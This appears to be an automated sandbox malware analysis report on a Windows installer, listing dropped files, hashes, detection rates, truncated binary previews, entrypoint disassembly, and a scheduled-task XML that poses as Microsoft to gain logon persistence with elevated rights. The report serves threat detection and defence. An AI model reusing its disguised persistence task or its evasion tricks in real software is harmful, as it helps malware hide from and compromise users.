Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	29730
Entropy (8bit):	7.994290657653607
Encrypted:	true
SSDEEP:	768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
MD5:	2C3E0D1FB580A8F0855355CC7D8D4F7A
SHA1:	177E4A0B7C4BC8ACE0F46127398808E669222515
SHA-256:	9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
SHA-512:	B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
Malicious:	false
Preview:	.@S....z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#\|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.\|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

C:\Program Files (x86)\Windows NT\locale7.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	29730
Entropy (8bit):	7.994290657653608
Encrypted:	true
SSDEEP:	768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
MD5:	A9C8A3E00692F79E1BA9693003F85D18
SHA1:	5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
SHA-256:	B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
SHA-512:	8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
Malicious:	false
Preview:	7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?......XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...\|Ynic......ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..\|..)f...C....$...E....H"x..F....wW...3"......Y.Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$.....&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

C:\Program Files (x86)\Windows NT\res.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	2410545
Entropy (8bit):	7.999922598249242
Encrypted:	true
SSDEEP:	49152:nLUmXREr6h9uO2l7gP53OuCh+FTUwUQ3uUQ/tcLaSD2+S+PJwygoB:phW6h9vs7gPNOB+FTU8/QVbSDtRwyJB
MD5:	05396EF5B04CF7708E0B2457EEC78612
SHA1:	8B60DB96BA19ED35FE4815D59812DAF2E0DA42AD
SHA-256:	600861E4C0354456CC76021E20F16EA49D9BBB6C9E7AFB808AAA4077FE9235DE
SHA-512:	FB7DF5B5852FB978EAF7904752A530C91F2AB703E0D973A038173FC15DFBD9C140F0D02DA57BA90C7BEEB22AF2335D14011215578E0D200548AD1CDA8B1CB2ED
Malicious:	false
Preview:	7z..'....3. ..$.....A..........l...5"]%..J..n.$...x...........H.=...D.%.OrO....<.M..}..e..t.8[(t...(.u...Oi .......R.t..a...2+L>...A]a...A..}...~....S#p.HO.......#.".k)...3.w...d8.....r.p...[..F.0m....FEi..K.h\|...F..}..5..._>..HF..h,!....:.&k......:./F.`..v.zeGD"\f]..U..\........B.w....a......"#..z.6......V Jh.[_....v...GQ5x.....Q....#...,ce...q].!w>....?@Wnj.m...A....O.4.-.+.k..g.;....$...p.tx.......q..HWy..\....2..(Ew..p...s!.y...........M..........9.0.2...Q.M..U\|ck...5A.%...\|7]@V...H..W..././d.......,.........C.#.d._4K.Lo.'p.."G..hg.6$o..^.lYg.;..8~...kB..YX.5.+8.]L.o.T.......6..>mb.......WE.S8..;{.o`..r..T$2.S...wk(R... &<.4.......yZ.!z6..\|.......iep..$...Ch......,..6...v.1E....]O .....\L.....1..=3..1z.(^....U.c....t.........L...-?......\|..w.x.9H...-.5d....n..b..s.S...V):...ci..!=+...2.7.u..E.\1.\n.1C.S........O.W<./G.G..R0..m.....HN...N@"^.~#(.-...va.{E.Ph...[..W.$....sb..+.nhn}W-...Bu"....tn. .....IRAxuU. ...j...e.C..7.<....?.k

C:\Program Files (x86)\Windows NT\tProtect.dll

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	63640
Entropy (8bit):	6.482810107683822
Encrypted:	false
SSDEEP:	768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
MD5:	B4EAACCE30F51EAF2A36CEA680B45A66
SHA1:	94493D7739C5EE7346DA31D9523404D62682B195
SHA-256:	15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
SHA-512:	16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.\|XN4.5N.\|HN6.5NA'XN6.5N.\|DN0.5N.\|IN6.5N.\|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

C:\Program Files (x86)\Windows NT\task.xml

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.339114067706043
Encrypted:	false
SSDEEP:	48:dXKLzDlnFL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDln8whldOVQOj6dKbKsz7
MD5:	F975D398F27F6D83FB489A1081571935
SHA1:	F288955EDB090D71EC2643D43F3765B2831E0FB3
SHA-256:	CFD5D65781809E9C9812031522218D18F72D04D32508C1B159898577158C4D7D
SHA-512:	3A01956CE56F88F34A16EBCA7C9BA05459DA94BD7E4B1F25FB832A845758A34A6B6DCE92BA874B30ADA387D0C9EB83DD6CA3D657ECF60FDE5FA55510F7020CA1
Malicious:	false
Preview:	<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvaila

C:\Program Files (x86)\Windows NT\trash

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	2160403
Entropy (8bit):	7.999915137888149
Encrypted:	true
SSDEEP:	49152:It2n0GjjLAmAsqpaBu1j6HHY98iLNC9s0GSUCrtIQ:fImVwassHHeLmGSPtIQ
MD5:	0CEBF47D80812A6BAC25DBB7BBD2A4BA
SHA1:	60C7165E374A09465A6864964E6FCE777A6A397E
SHA-256:	A3783734750CAE6E97CF1A2FAA2E8716B6C91A9F1D05C23C1370969D01772353
SHA-512:	D39E65CD10D767937907F1EDD1AA6F1F0D73D83F852635A10C4809C0161D0634C3E8764DD019CB19DEEC7D299D5268D27154997F05675B0E061D0D1C6AC8EB8D
Malicious:	false
Preview:	.U_O..h...=...`.f5...........3...._E..M...A.P..)....8.&>..9...Uye..,.X$.^.T...$...\2.uz>H.>E........B#..y..0...k`..C..!.."}.~)..X..gR.P.....E.@l...Tr...._m..m..Pv.....7?A.Z.o#..I>..)S.1.+...........j.L.b....B.2..T. `e_..d:m.~..B..hw..S............YS..:.v`}..%...1.c.H.W.....Y....\..q....$4..+jN.,q...ra.....v".J$.9.. .}k<..cC...k%7.i+~`.....g.......m.`.3z.......tQxf...vJ:zpV..<..oi)...C....a.G.]...@E]../h..0.e.B..u......@\%.E...T..w....O...3$j.7TTK.?]a..1^/g...05;D. ...Y.&..!......f!.V.......).M..n..].[hu.).....Mc.$l}Db....\..W`...R..0.......)"....n.WR..Y.O...".r.._..>...b.z..d.......w8.,v...9.l.R.U\{..=.}.g.@........Ut.3..Y.....m.....yKz..S?.q..P.qs...il.mN<L..-]m...P..0.z\.`#]....hQL.<...\.Xa.;..V.!.....cJx.\..!t;5< E.&C.~ ;$.u..z..Ay8......#..=.+.....P..B/.'(J..L..hR.h..H.3."..&.!.{.q.....(.06...............6...........G.Oe......e=.2:AK."o#}>\|\|...!.C....n....M...7....u..=..!..~.. ......N..[Me;OFj.....^V..X5.9}#..Y&.*..".[.`...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulVmdtZ:NllUM
MD5:	013016A37665E1E37F0A3576A8EC8324
SHA1:	260F55EC88E3C4D384658F3C18C7FDEF202E47DD
SHA-256:	20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
SHA-512:	99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jiv1z5c.eg5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kf54lnsk.kag.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nl0globk.rqv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zf3rxwz5.yku.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-0SINS.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-0SINS.tmp\update.vac

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3606016
Entropy (8bit):	7.0063494494702985
Encrypted:	false
SSDEEP:	49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
MD5:	95ACD5631A9131DB1FD066565AFC9A67
SHA1:	8E9473BD632FF0F57FC34EECAC17174341D80D94
SHA-256:	EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
SHA-512:	70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-64MMK.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-64MMK.tmp\update.vac

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3606016
Entropy (8bit):	7.0063494494702985
Encrypted:	false
SSDEEP:	49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
MD5:	95ACD5631A9131DB1FD066565AFC9A67
SHA1:	8E9473BD632FF0F57FC34EECAC17174341D80D94
SHA-256:	EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
SHA-512:	70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Download File

Process:	C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3366912
Entropy (8bit):	6.5305633078734635
Encrypted:	false
SSDEEP:	98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:	65559DDD30465F50270FB7E9EE6E6C7C
SHA1:	0645894756C448F9DE22FAE9E65EF1DA36FE63CE
SHA-256:	EABC186313A00D4795DA37132F1549C754E093E9B1B6D706AAD01528AE5D986F
SHA-512:	B858B63FD23F75D114DA89B79B94272679110F5D149890783CB28960A23299F22CE723918CAFCD4FAC3198C59A2AE32787E6C08A1CBF1AC69C789361662CF43D
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Download File

Process:	C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3366912
Entropy (8bit):	6.5305633078734635
Encrypted:	false
SSDEEP:	98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:	65559DDD30465F50270FB7E9EE6E6C7C
SHA1:	0645894756C448F9DE22FAE9E65EF1DA36FE63CE
SHA-256:	EABC186313A00D4795DA37132F1549C754E093E9B1B6D706AAD01528AE5D986F
SHA-512:	B858B63FD23F75D114DA89B79B94272679110F5D149890783CB28960A23299F22CE723918CAFCD4FAC3198C59A2AE32787E6C08A1CBF1AC69C789361662CF43D
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

\Device\ConDrv

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	406
Entropy (8bit):	5.117520345541057
Encrypted:	false
SSDEEP:	6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
MD5:	9200058492BCA8F9D88B4877F842C148
SHA1:	EED69748A26CFAF769EF589F395A162E87005B36
SHA-256:	BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
SHA-512:	312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
Malicious:	false
Preview:	..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.956049914920317
TrID:	Win32 Executable (generic) a (10002005/4) 98.04% Inno Setup installer (109748/4) 1.08% InstallShield setup (43055/19) 0.42% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	#U5b89#U88c5#U52a9#U624b2.0.6.exe
File size:	8'206'704 bytes
MD5:	c5c5262b26879c84d470ef4a5b73663d
SHA1:	c907618ac1db8f8186469e0bcfff2debc0b49fdd
SHA256:	b53886e5499226b7565d65fd25ecd448f82434cac355d799ea2e39e0d822b234
SHA512:	5a859f9164d18ba5cf9dfc109e7c0b024cc30d18ab03d109ec950529c7b3a7a782db19159c6d353567c4d12cf2a83d894af251848bdc20b04a36129a25b397df
SSDEEP:	98304:XwRE36w8t6MocqxphH99gaAEglulhqv8om22U2t9+/LQdHMeiTNmJaSj5wylhNbv:lGt8jxP99PF6vXG01TUASjbLjn
TLSH:	2C862223F2CBE13DE45A0B3B05B2A55894FB6A216823AD5396ECB4ECCF351501D3E647
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x4a83bc
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	40ab50289f7ef5fae60801f88d4541fc

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004A2EBCh
call 00007FC204E9B9D5h
xor eax, eax
push ebp
push 004A8AC1h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004A8A7Bh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004B0634h]
call 00007FC204F2D35Bh
call 00007FC204F2CEAEh
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007FC204F27B88h
mov edx, dword ptr [ebp-14h]
mov eax, 004B41F4h
call 00007FC204E95A83h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004B41F4h]
mov dl, 01h
mov eax, dword ptr [0049CD14h]
call 00007FC204F28EB3h
mov dword ptr [004B41F8h], eax
xor edx, edx
push ebp
push 004A8A27h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007FC204F2D3E3h
mov dword ptr [004B4200h], eax
mov eax, dword ptr [004B4200h]
cmp dword ptr [eax+0Ch], 01h
jne 00007FC204F340CAh
mov eax, dword ptr [004B4200h]
mov edx, 00000028h
call 00007FC204F297A8h
mov edx, dword ptr [004B4200h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xb7000	0x71	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb5000	0xfec	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcb000	0x11000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0x10fa8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xb9000	0x18	.rdata
